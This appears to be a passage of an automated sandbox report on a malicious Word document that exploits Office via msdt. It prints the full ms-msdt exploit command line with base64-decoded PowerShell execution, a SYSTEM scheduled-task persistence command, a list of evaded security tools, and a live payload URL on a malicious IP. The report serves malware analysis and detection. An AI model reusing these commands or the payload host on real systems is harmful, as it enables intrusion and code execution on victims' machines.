                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_0082A1B2 push ebx; ret 28_2_0082A1B3
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_00810334 pushad ; iretd 28_2_00810335
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_0082BCE1 push esi; iretd 28_2_0082BCE6
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_0082E508 pushad ; retf 28_2_0082E511
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_0082E638 push edx; ret 28_2_0082E63F
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_00829F00 push cs; iretd 28_2_00829FD6
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04B0B02E push ebx; ret 29_2_04B0B02F
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04AF01B0 pushad ; iretd 29_2_04AF01B1
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04B0AD7C push cs; iretd 29_2_04B0AE52
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04B0AE7E push cs; iretd 29_2_04B0AE52
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04B0CB5D push esi; iretd 29_2_04B0CB62
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04AC0790 push edx; ret 29_2_04AC1250
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04ABBCE1 push esi; iretd 29_2_04ABBCE6
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04ABE508 pushad ; retf 29_2_04ABE511
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04ABE638 push edx; ret 29_2_04ABE63F
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04AB9F00 push cs; iretd 29_2_04AB9FD6
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04ABA002 push cs; iretd 29_2_04AB9FD6
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04ABA1B2 push ebx; ret 29_2_04ABA1B3
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04AA0334 pushad ; iretd 29_2_04AA0335
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_0499EEBB LoadLibraryA,GetProcAddress, 27_2_0499EEBB
                            Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
                            Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
                            Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline

                            Persistence and Installation Behavior

                            Source: document.xml.rels Extracted files from sample: mhtml:http://185.234.247.119:80/123.res!http://185.234.247.119:80/123.res
                            Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dll
                            Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui

                            Boot Survival

                            Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 4384 base: 90F380 value: E9 40 6E 67 02
                            Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2256 base: 90F380 value: E9 40 6E 55 02
                            Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 5492 base: 90F380 value: E9 40 6E 5B 02
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: explorer.exe, 00000021.00000003.679709258.0000000003442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE-
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE2
                            Source: explorer.exe, 00000021.00000003.679709258.0000000003442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5152Thread sleep count: 120 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5332Thread sleep count: 120 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 2212Thread sleep count: 66 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 5996Thread sleep count: 49 > 30
                            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_27-13399
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1365Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_27-11569
                            Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499DD62 GetSystemInfo,27_2_0499DD62
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499BCFC FindFirstFileW,FindNextFileW,27_2_0499BCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042ABCFC FindFirstFileW,FindNextFileW,28_2_042ABCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFBCFC FindFirstFileW,FindNextFileW,29_2_04AFBCFC
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F8BCFC FindFirstFileW,FindNextFileW,32_2_02F8BCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499EEBB LoadLibraryA,GetProcAddress,27_2_0499EEBB
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory protected: page write copy | page execute and write copy | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2FB0000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 90F380Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2E90000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 90F380Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2EF0000Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 90F380Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2FB0000 protect: page read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2E90000 protect: page read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 2EF0000 protect: page read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4384 base: 2FB0000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4384 base: 90F380 value: E9Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2256 base: 2E90000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2256 base: 90F380 value: E9Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5492 base: 2EF0000 value: 9CJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5492 base: 90F380 value: E9Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499A065 GetSystemTimeAsFileTime,27_2_0499A065
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499DF3D GetCurrentProcessId,LookupAccountSidW,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,27_2_0499DF3D
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                            Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                            Stealing of Sensitive Information


                            Remote Access Functionality

                            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                            Valid Accounts1
                            Command and Scripting Interpreter
                            1
                            Scheduled Task/Job
                            411
                            Process Injection
                            11
                            Masquerading
                            1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                            Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 11 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                            Domain Accounts | 3 Native API | Logon Script (Windows) | 1 DLL Side-Loading | 1 Disable or Modify Tools | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                            Local Accounts | 12 Exploitation for Client Execution | Logon Script (Mac) | Logon Script (Mac) | 411 Process Injection | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | 21 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud
                            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
                            Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
                            External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
                            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 3 File and Directory Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
                            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 16 System Information Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
                            Behavior Graph (ID: 640940; Sample: doc782.docx; Start date: 07/06/2022; Architecture: WINDOWS; Score: 100)

                            Source | Detection | Scanner | Label
                            doc782.docx | 29% | Virustotal |
                            doc782.docx | 17% | ReversingLabs | Document-Office.Exploit.CVE-2021-40444

                            Source | Detection | Scanner | Label
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll | 0% | Metadefender |
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll | 0% | ReversingLabs |
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui | 0% | Metadefender |
                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui | 0% | ReversingLabs |

                            Source | Detection | Scanner | Label
                            32.2.explorer.exe.2f80000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
                            34.2.explorer.exe.2ec0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
                            32.0.explorer.exe.2f80000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
                            33.0.explorer.exe.2e60000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
                            29.2.regsvr32.exe.4af0000.3.unpack | 100% | Avira | HEUR/AGEN.1234562
                            34.0.explorer.exe.2ec0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
                            28.2.regsvr32.exe.42f0000.3.unpack | 100% | Avira | HEUR/AGEN.1232827
                            28.2.regsvr32.exe.42a0000.2.unpack | 100% | Avira | HEUR/AGEN.1234562
                            27.2.regsvr32.exe.4420000.2.unpack | 100% | Avira | HEUR/AGEN.1232827
                            27.2.regsvr32.exe.4990000.3.unpack | 100% | Avira | HEUR/AGEN.1234562
                            38.2.regsvr32.exe.2d80000.0.unpack | 100% | Avira | HEUR/AGEN.1232827
                            33.2.explorer.exe.2e60000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
                            29.2.regsvr32.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1232827
                            No Antivirus matches
                            Source | Detection | Scanner | Label
                            No contacted domains info
                            Name | Malicious | Antivirus Detection | Reputation
                            http://185.234.247.119/123.RES | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
                            Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://insertmedia.bing.office.net/odc/insertmediaDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://o365auditrealtimeingestion.manage.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://api.office.netDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://incidents.diagnosticssdf.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://asgsmsproxyapi.azurewebsites.net/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/android/policiesDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://entitlement.diagnostics.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://substrate.office.com/search/api/v2/initDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://outlook.office.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/soap/regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://storage.live.com/clientlogs/uploadlocationDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://outlook.office365.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://webshell.suite.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistoryDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.borland.com/namespaces/Typesregsvr32.exe, 0000001C.00000002.672872094.0000000000867000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.borland.com/namespaces/Typespregsvr32.exe, 0000001B.00000002.672627187.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://management.azure.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.234.247.119 | unknown | Russian Federation | 198004 | INTERKONEKT-ASPL | true
IP
192.168.2.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 640940
Start date and time: 2022-06-07 19:48:55 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 54s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: doc782.docx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 41
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOCX@31/32@0/2
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HDC Information:
                                                                                                                                                                      • Successful, ratio: 15.4% (good quality ratio 14.6%)
                                                                                                                                                                      • Quality average: 77.3%
                                                                                                                                                                      • Quality standard deviation: 26.3%
                                                                                                                                                                      HCA Information:
